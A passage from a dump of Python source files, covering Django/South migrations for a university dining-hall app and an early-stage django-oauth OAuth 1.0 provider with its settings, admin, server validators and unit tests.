\"'dia_fin'\", 'to': u\"orm['victor.Dia_Semana']\"}),\n 'dia_inicio': ('django.db.models.fields.related.ForeignKey', [], {'related_name': \"'dia_inicio'\", 'to': u\"orm['victor.Dia_Semana']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.horario_plato': {\n 'Meta': {'object_name': 'Horario_Plato'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'})\n },\n u'victor.plato': {\n 'Meta': {'object_name': 'Plato'},\n 'descripcion': ('django.db.models.fields.TextField', [], {'max_length': '140'}),\n 'horario': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Horario_Plato']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'})\n },\n u'victor.saldo': {\n 'Meta': {'object_name': 'Saldo'},\n 'dinero_soles': ('django.db.models.fields.FloatField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'num_comidas': ('django.db.models.fields.IntegerField', [], {})\n }\n }\n\n complete_apps = ['victor']"
},
{
"alpha_fraction": 0.8291139006614685,
"alphanum_fraction": 0.8291139006614685,
"avg_line_length": 25.33333396911621,
"blob_id": "9fd8cdb62feed7596dc8c9bbbf6382b93ab77106",
"content_id": "50cb3091ee123ba1abb18ba8ac04636b50a8873a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 6,
"path": "/victor/views.py",
"repo_name": "akatsukidev/comedunt",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponse,HttpResponseRedirect\n\n\ndef home(request):\n\treturn HttpResponse(\"Pantalla de Inicio\")\n"
},
{
"alpha_fraction": 0.5284024477005005,
"alphanum_fraction": 0.5342328548431396,
"avg_line_length": 55.11214828491211,
"blob_id": "1654f94e254db0dd218784bb7880b3628cc26bce",
"content_id": "f37c6aa5db437ba9dadec2ae4a647f876ef68574",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6003,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 107,
"path": "/victor/migrations/0002_auto__add_field_comensal_gastos_totales.py",
"repo_name": "akatsukidev/comedunt",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding field 'Comensal.gastos_totales'\n db.add_column(u'victor_comensal', 'gastos_totales',\n self.gf('django.db.models.fields.FloatField')(default=0),\n keep_default=False)\n\n\n def backwards(self, orm):\n # Deleting field 'Comensal.gastos_totales'\n db.delete_column(u'victor_comensal', 'gastos_totales')\n\n\n models = {\n u'victor.asistencia': {\n 'Meta': {'object_name': 'Asistencia'},\n 'comensal': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Comensal']\"}),\n 'estado': ('django.db.models.fields.BooleanField', [], {}),\n 'fecha_hora': ('django.db.models.fields.DateTimeField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'plato': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Plato']\"})\n },\n u'victor.categoria': {\n 'Meta': {'object_name': 'Categoria'},\n 'descripcion': ('django.db.models.fields.TextField', [], {'max_length': '140'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'}),\n 'precio': ('django.db.models.fields.FloatField', [], {})\n },\n u'victor.ciclo': {\n 'Meta': {'object_name': 'Ciclo'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '2'})\n },\n u'victor.comensal': {\n 'Meta': {'object_name': 'Comensal'},\n 'apellidos': ('django.db.models.fields.CharField', [], {'max_length': '140'}),\n 'categoria': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Categoria']\"}),\n 'ciclo': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Ciclo']\"}),\n 'direccion': ('django.db.models.fields.CharField', [], {'max_length': '140'}),\n 'dni': ('django.db.models.fields.CharField', [], {'max_length': '9'}),\n 'escuela': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Escuela']\"}),\n 'estado': ('django.db.models.fields.BooleanField', [], {}),\n 'fechas_rojas': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Fecha_Roja']\"}),\n 'gastos_totales': ('django.db.models.fields.FloatField', [], {}),\n 'horario': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Horario']\"}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'}),\n 'num_matricula': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),\n 'saldo': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Saldo']\"})\n },\n u'victor.dia_semana': {\n 'Meta': {'object_name': 'Dia_Semana'},\n 'dia': ('django.db.models.fields.CharField', [], {'max_length': '10'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.escuela': {\n 'Meta': {'object_name': 'Escuela'},\n 'facultad': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Facultad']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '140'})\n },\n u'victor.facultad': {\n 'Meta': {'object_name': 'Facultad'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '140'})\n },\n u'victor.fecha_roja': {\n 'Meta': {'object_name': 'Fecha_Roja'},\n 'dia_fin': ('django.db.models.fields.DateField', [], {}),\n 'dia_inicio': ('django.db.models.fields.DateField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.horario': {\n 'Meta': {'object_name': 'Horario'},\n 'dia_fin': ('django.db.models.fields.related.ForeignKey', [], {'related_name': \"'dia_fin'\", 'to': u\"orm['victor.Dia_Semana']\"}),\n 'dia_inicio': ('django.db.models.fields.related.ForeignKey', [], {'related_name': \"'dia_inicio'\", 'to': u\"orm['victor.Dia_Semana']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.horario_plato': {\n 'Meta': {'object_name': 'Horario_Plato'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'})\n },\n u'victor.plato': {\n 'Meta': {'object_name': 'Plato'},\n 'descripcion': ('django.db.models.fields.TextField', [], {'max_length': '140'}),\n 'horario': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Horario_Plato']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'})\n },\n u'victor.saldo': {\n 'Meta': {'object_name': 'Saldo'},\n 'dinero_soles': ('django.db.models.fields.FloatField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'num_comidas': ('django.db.models.fields.IntegerField', [], {})\n }\n }\n\n complete_apps = ['victor']"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 23.58823585510254,
"blob_id": "b98a42c001e42b7d7799b51c61597019cdc23ebf",
"content_id": "d3ec1d790c48363b75d90e64850c93ad7863261f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 17,
"path": "/victor/admin.py",
"repo_name": "akatsukidev/comedunt",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom models import *\n\n\nadmin.site.register(Saldo)\nadmin.site.register(Dia_Semana)\nadmin.site.register(Horario)\nadmin.site.register(Fecha_Roja)\nadmin.site.register(Horario_Plato)\nadmin.site.register(Plato)\nadmin.site.register(Categoria)\nadmin.site.register(Comensal)\nadmin.site.register(Asistencia)\nadmin.site.register(Ciclo)\nadmin.site.register(Facultad)\nadmin.site.register(Escuela)\n"
}
] | 5 |
craigbruce/django-oauth
|
https://github.com/craigbruce/django-oauth
|
0eab80615858d3eb7bd1d7dc5d6edb3e6c5402e0
|
1427ab228ed65a1848038dbd62b96809ed2f45ba
|
e67dfb83532005ac415d1c5b083dc952770ca4e5
|
refs/heads/master
| 2020-12-30T10:36:35.284313 | 2013-07-01T17:15:51 | 2013-07-01T17:15:51 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6184346079826355,
"alphanum_fraction": 0.6230689883232117,
"avg_line_length": 22.119047164916992,
"blob_id": "66cc54b107dd28d6bf8264c43f619d8f9c891946",
"content_id": "45b5bab52828b7ee55d9f62e587b0b93893edaf6",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1942,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 84,
"path": "/project/settings.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "# Django settings based on 1.4.\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Test User', '[email protected]'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'db.sqlite',\n }\n}\n\nTIME_ZONE = 'America/Denver'\n\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = ''\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'bjve4v4s%c#-#a#1zx8gca$pk(!+-n8f_sp-b+nb0@ticyp@n%'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'oauth',\n 'south',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n"
},
{
"alpha_fraction": 0.5888445973396301,
"alphanum_fraction": 0.5952191352844238,
"avg_line_length": 28.880952835083008,
"blob_id": "f7e3943164ad95245663dc061d5990af0b47fc93",
"content_id": "6f5c47f230fd598c27b58d28e27252e53f46ed38",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1255,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 42,
"path": "/setup.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "import os\nfrom setuptools import setup, find_packages\n\ndef read_file(filename):\n \"\"\"Read a file into a string\"\"\"\n path = os.path.abspath(os.path.dirname(__file__))\n filepath = os.path.join(path, filename)\n try:\n return open(filepath).read()\n except IOError:\n return ''\n\nsetup(\n name='django-oauth',\n version=__import__('oauth').__version__,\n author='Craig Bruce',\n author_email='[email protected]',\n description=u' '.join(__import__('oauth').__doc__.splitlines()).strip(),\n license='BSD',\n keywords='django oauth provider',\n url='https://github.com/craigbruce/django-oauthlib',\n packages=find_packages(),\n include_package_data=True,\n long_description=read_file('README.rst'),\n install_requires = ['docutils>=0.3'],\n test_suite=\"runtests.runtests\",\n zip_safe=False,\n requires=[\n 'django(>=1.4)',\n 'oauthlib(>=0.3.0)',\n ],\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: BSD License',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n ],\n)\n"
},
{
"alpha_fraction": 0.746666669845581,
"alphanum_fraction": 0.746666669845581,
"avg_line_length": 14.199999809265137,
"blob_id": "af2044a5df52f8bf3b96b87bc1e45da05f9ef1f9",
"content_id": "a3903c891d614ca671dfce6f8ca0b683a06c2ca5",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 75,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 5,
"path": "/tests/run_tests.sh",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nexport PYTHONPATH=../:$PYTHONPATH\n\npython manage.py test oauth"
},
{
"alpha_fraction": 0.5461538434028625,
"alphanum_fraction": 0.5461538434028625,
"avg_line_length": 31.5,
"blob_id": "6754201a06a162d527f2e4e313b6f0a13a11fd17",
"content_id": "bf4f7b91723f78bde26ecc318482a7ca3afdbae8",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 130,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 4,
"path": "/CONTRIBUTING.rst",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "Guidelines for contributing to django-oauth\n===========================================\n\nCommon sense will prevail in most cases.\n"
},
{
"alpha_fraction": 0.4444444477558136,
"alphanum_fraction": 0.4444444477558136,
"avg_line_length": 8,
"blob_id": "e478059b74fb4df4ffd88697b3a351158b0e9703",
"content_id": "aacf2bbcaa605e56153a75bbfe752989b946df50",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 9,
"license_type": "permissive",
"max_line_length": 8,
"num_lines": 1,
"path": "/AUTHORS.rst",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "* Michael Mior\n"
},
{
"alpha_fraction": 0.6869712471961975,
"alphanum_fraction": 0.6886633038520813,
"avg_line_length": 26.488372802734375,
"blob_id": "008580a49100300eb31a2fdbc8ea6d8a5c6429df",
"content_id": "d4d93d88b6923604c43113f3ed75307ff64beb06",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1182,
"license_type": "permissive",
"max_line_length": 217,
"num_lines": 43,
"path": "/README.rst",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "django-oauthlib\n===============\n\n.. note::\n\tGiven a flurry of other django oauth related projects having cropped up. I suggest you try one of them out. `Django OAuth Toolkit <https://github.com/evonove/django-oauth-toolkit>`_ looks very promising, for example.\n\n\nAn OAuth provider built on `oauthlib <https://github.com/idan/oauthlib/>`_ wrapped with Django. Currently targeting OAuth 1.0. This project is under (slow) development.\n\n.. image:: https://travis-ci.org/craigbruce/django-oauth.png?branch=master\n :target: https://travis-ci.org/craigbruce/django-oauth\n\nInstallation\n------------\n\nDirect from GitHub using ``pip install git+https://github.com/craigbruce/django-oauthlib.git#egg=django-oauthlib``. django-oauthlib will be made available on PyPI after more development.\n\nIn your Django ``settings.py`` add ``oauth`` to your ``INSTALLED_APPS``::\n\n INSTALLED_APPS = (\n 'django.contrib.auth',\n ...\n 'oauth',\n )\n\nUsage\n-----\n\nTo follow.\n\nTests\n-----\n\nCreate a virtualenv first, then::\n\n pip install -U -r requirements.txt\n cd tests\n ./run_tests.sh\n\nLicense\n-------\n\ndjango-oauthlib is licensed under the BSD license, see LICENSE.\n"
},
{
"alpha_fraction": 0.5830363631248474,
"alphanum_fraction": 0.5930149555206299,
"avg_line_length": 22.779661178588867,
"blob_id": "62dacb3622893da00f596731fcda6dc82d84b0d4",
"content_id": "e1a08217451d93bf272e47f0da36647c6a8841ac",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1403,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 59,
"path": "/oauth/views.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\n# Django also has an urlencode method\nfrom oauthlib.oauth1.rfc5849.utils import urlencode\nfrom oauth.server import OAuthServer\n\n\ndef temporary_credentials_request(request):\n\n if request.META['HTTP_AUTHORIZATION']:\n t = 'Auth present'\n else:\n t = 'missing'\n\n# response = urlencode({\n# 'realm': 1,\n# 'oauth_consumer_key': 2,\n# 'oauth_signature_method': 3,\n# 'oauth_timestamp': 4,\n# 'oauth_nonce': 5,\n# 'oauth_callback': 6,\n# 'oauth_signature': 7\n# })\n\n authorized = OAuthServer.verify_request(\n request.build_absolute_uri(),\n request.method,\n request.body,\n request.META,\n require_resource_owner=False\n )\n# authorized = OAuthServer.verify_request(\n# uri,\n# http_method,\n# body,\n# headers,\n# require_resource_owner=False\n# )\n\n# response = urlencode({\n# 'oauth_token': 1,\n# 'oauth_token_secret': 2,\n# 'oauth_callback_confirmed': 'true'\n# })\n\n #response = \"%s %s\" % request.META['Authorization'],\n # request.META['QUERY_STRING']\n response = \"%s\" % t\n\n return HttpResponse(response)\n #return HttpResponse(response,\n # content_type='application/x-www-form-urlencoded')\n\n\ndef user_authorization(request):\n pass\n\n\ndef token_request(request):\n pass\n"
},
{
"alpha_fraction": 0.7038745284080505,
"alphanum_fraction": 0.7038745284080505,
"avg_line_length": 28.29729652404785,
"blob_id": "ee0e023f296813974203ddd51cc949e0142c6220",
"content_id": "d3c46eb012ae536faa2f172b1631133c047c6579",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1084,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 37,
"path": "/oauth/admin.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom oauth.models import ClientCredential, Nonce, TokenType, Token,\\\n Resource, Realm\n\n\nclass ClientCredentialsOptions(admin.ModelAdmin):\n list_display = ('id', 'user', 'key', 'secret', 'name', 'callback')\n\n\nclass NonceOptions(admin.ModelAdmin):\n list_display = ('id', 'key', 'nonce', 'request_token', 'access_token',\n 'timestamp')\n\n\nclass TokenTypeOptions(admin.ModelAdmin):\n list_display = ('id', 'token_type')\n\n\nclass TokenOptions(admin.ModelAdmin):\n list_display = ('id', 'token_type', 'resource', 'client_key',\n 'key', 'secret', 'timestamp')\n\n\nclass ResourceOptions(admin.ModelAdmin):\n list_display = ('id', 'name', 'url')\n\n\nclass RealmOptions(admin.ModelAdmin):\n list_display = ('name', 'client_key')\n\n\nadmin.site.register(ClientCredential, ClientCredentialsOptions)\nadmin.site.register(Nonce, NonceOptions)\nadmin.site.register(TokenType, TokenTypeOptions)\nadmin.site.register(Token, TokenOptions)\nadmin.site.register(Resource, ResourceOptions)\nadmin.site.register(Realm, RealmOptions)\n"
},
{
"alpha_fraction": 0.5849056839942932,
"alphanum_fraction": 0.6415094137191772,
"avg_line_length": 17,
"blob_id": "b3b123eb9e7b7402dabe347047d69959dc827ba1",
"content_id": "35a59347c48cc6040237cfc8b98eef03527d3c22",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 3,
"path": "/oauth/__init__.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "\"An oauth provider for Django\"\n\n__version__ = '0.0.1'"
},
{
"alpha_fraction": 0.5290108919143677,
"alphanum_fraction": 0.5315420627593994,
"avg_line_length": 27.375690460205078,
"blob_id": "0aaa0d84d974a5ee79ce4acf1048eb3f9ccf9d76",
"content_id": "56cd0cb031ebc64d6445d733bc3689905fd4a97f",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5136,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 181,
"path": "/oauth/server.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "from django.core.exceptions import ObjectDoesNotExist\nfrom oauthlib.common import safe_string_equals\nfrom oauthlib.oauth1.rfc5849 import Server\nfrom oauth.models import ClientCredential, Nonce, Token, Realm, Resource\n\n\nclass OAuthServer(Server):\n\n @property\n def dummy_client(self):\n return u'dummy_client'\n\n @property\n def dummy_request_token(self):\n return u'dummy_request_token'\n\n @property\n def dummy_access_token(self):\n return u'dummy_access_token'\n\n def validate_timestamp_and_nonce(self, client_key, timestamp, nonce,\n request_token=None, access_token=None):\n\n try:\n c = ClientCredential.objects.get(key=client_key)\n except ObjectDoesNotExist:\n return False\n n = Nonce.objects.filter(key=c)\n if n.exists():\n #client_key has been used before\n matches = n.filter(nonce=nonce, timestamp=timestamp,\n request_token=request_token,\n access_token=access_token)\n if matches.exists():\n # nonce/timestamp/request_token/access_token\n # combo have been used before\n return False\n\n Nonce.objects.create(nonce=nonce, timestamp=timestamp,\n key=c, request_token=request_token,\n access_token=access_token)\n\n key = None\n if request_token:\n key = request_token\n elif access_token:\n key = access_token\n\n return client_key, timestamp, nonce, key\n\n def validate_client_key(self, client_key):\n\n try:\n c = ClientCredential.objects.get(key=client_key)\n return c.key\n except ObjectDoesNotExist:\n return False\n\n def validate_request_token(self, client_key, request_token):\n\n try:\n t = Token.objects.filter(client_key__key=client_key,\n key=request_token, token_type=1)\n except ObjectDoesNotExist:\n return False\n\n if t.exists():\n return True\n else:\n return False\n\n def validate_access_token(self, client_key, access_token):\n\n try:\n t = Token.objects.filter(client_key__key=client_key,\n key=access_token, token_type=2)\n except ObjectDoesNotExist:\n return False\n\n if t.exists():\n return True\n else:\n return False\n\n def validate_redirect_uri(self, client_key, redirect_uri):\n\n try:\n c = ClientCredential.objects.filter(key=client_key,\n callback=redirect_uri)\n except ObjectDoesNotExist:\n return False\n\n if c.exists():\n return True\n else:\n return False\n\n def validate_realm(self, client_key, access_token,\n uri=None, required_realm=None):\n\n if required_realm:\n try:\n r = Realm.objects.filter(\n client_key__key=client_key,\n access_token=access_token,\n name=required_realm)\n except ObjectDoesNotExist:\n return False\n\n if r.exists():\n return required_realm\n else:\n return False\n else:\n try:\n r = Realm.objects.filter(url=uri)\n except ObjectDoesNotExist:\n return False\n\n if r.exists():\n return r[0].url\n else:\n return False\n\n def validate_requested_realm(self, client_key, realm):\n\n try:\n r = Realm.objects.filter(name=realm, client_key__key=client_key)\n except ObjectDoesNotExist:\n return False\n\n if r.exists():\n return realm\n else:\n return False\n\n# def validate_verifier(self, client_key, access_token, verifier):\n#\n# return safe_string_equals(verifier, (client_key, access_token))\n\n def get_client_secret(self, client_key):\n\n try:\n c = ClientCredential.objects.filter(key=client_key)\n except ObjectDoesNotExist:\n return False\n\n if c.exists():\n return c[0].secret\n else:\n False\n\n def get_request_token_secret(self, client_key, request_token):\n\n try:\n t = Token.objects.filter(\n client_key__key=client_key,\n key=request_token,\n token_type=1)\n except ObjectDoesNotExist:\n return False\n\n if t.exists():\n return t[0].secret\n else:\n False\n\n def get_access_token_secret(self, client_key, access_token):\n\n try:\n t = Token.objects.filter(\n client_key__key=client_key,\n key=access_token,\n token_type=2)\n except ObjectDoesNotExist:\n return False\n\n if t.exists():\n return t[0].secret\n else:\n False\n"
},
{
"alpha_fraction": 0.5911041498184204,
"alphanum_fraction": 0.6073351502418518,
"avg_line_length": 39.29874038696289,
"blob_id": "0a13f7ce0a8955050f6a2e0699219c97f58b8547",
"content_id": "c9b37738ac7cdae09eec17971405377b67ba505c",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12815,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 318,
"path": "/oauth/tests.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom django.test import TestCase\nfrom oauth.models import ClientCredential, Nonce, Token, Realm\nfrom oauth.server import OAuthServer\n\n\nclass OAuthServerTest(TestCase):\n fixtures = ['initial_data.json', 'test_user.json', 'test_entries.json']\n\n def setUp(self):\n super(OAuthServerTest, self).setUp()\n\n # Credentials\n self.user = User.objects.get(pk=1)\n\n # Object to test on\n self.clientcredentials = ClientCredential.objects.get(pk=1)\n self.oauthserver = OAuthServer()\n\n # Nose setting for long diffs\n #self.maxDiff = None\n\n def test_validate_timestamp_and_nonce(self):\n self.nonce = Nonce.objects.get(pk=1)\n #Credentials already used\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, self.nonce.timestamp,\n self.nonce.nonce))\n #New timestamp\n self.assertEquals(\n self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, 987654322,\n self.nonce.nonce),\n (self.clientcredentials.key, 987654322,\n self.nonce.nonce, None))\n #New nonce\n self.assertEquals(\n self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce.timestamp, 'abc'),\n (self.clientcredentials.key, self.nonce.timestamp,\n 'abc', None))\n #Incorrect client key\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n 'm7UQ0_n8M0vUNmdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=',\n self.nonce.timestamp, self.nonce.nonce))\n\n def test_validate_timestamp_and_nonce_request_token(self):\n self.nonce_request_token = Nonce.objects.get(pk=2)\n #Credentials already used\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_request_token.timestamp,\n self.nonce_request_token.nonce,\n self.nonce_request_token.request_token))\n #New timestamp\n self.assertEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, 987654322,\n self.nonce_request_token.nonce,\n self.nonce_request_token.request_token),\n (self.clientcredentials.key, 987654322,\n self.nonce_request_token.nonce,\n self.nonce_request_token.request_token))\n self.assertNotEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, 987654323,\n self.nonce_request_token.nonce,\n self.nonce_request_token.request_token),\n (self.clientcredentials.key, 987654323,\n self.nonce_request_token.nonce, None))\n #New nonce\n self.assertEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_request_token.timestamp,\n 'abc', self.nonce_request_token.request_token),\n (self.clientcredentials.key,\n self.nonce_request_token.timestamp,\n 'abc', self.nonce_request_token.request_token))\n self.assertNotEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_request_token.timestamp,\n 'abc', self.nonce_request_token.request_token),\n (self.clientcredentials.key,\n self.nonce_request_token.timestamp,\n 'abc', None))\n #Incorrect client key\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n 'm7UQ0_n8M0vUNmdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=',\n self.nonce_request_token.timestamp,\n self.nonce_request_token.nonce,\n self.nonce_request_token.request_token))\n\n def test_validate_timestamp_and_nonce_access_token(self):\n self.nonce_access_token = Nonce.objects.get(pk=3)\n #Credentials already used\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_access_token.timestamp,\n self.nonce_access_token.nonce,\n None, self.nonce_access_token.access_token))\n #New timestamp\n self.assertEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, 987654322,\n self.nonce_access_token.nonce, None,\n self.nonce_access_token.access_token),\n (self.clientcredentials.key, 987654322,\n self.nonce_access_token.nonce,\n self.nonce_access_token.access_token))\n self.assertNotEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, 987654323,\n self.nonce_access_token.nonce, None,\n self.nonce_access_token.access_token),\n (self.clientcredentials.key, 987654323,\n self.nonce_access_token.nonce, None))\n #New nonce\n 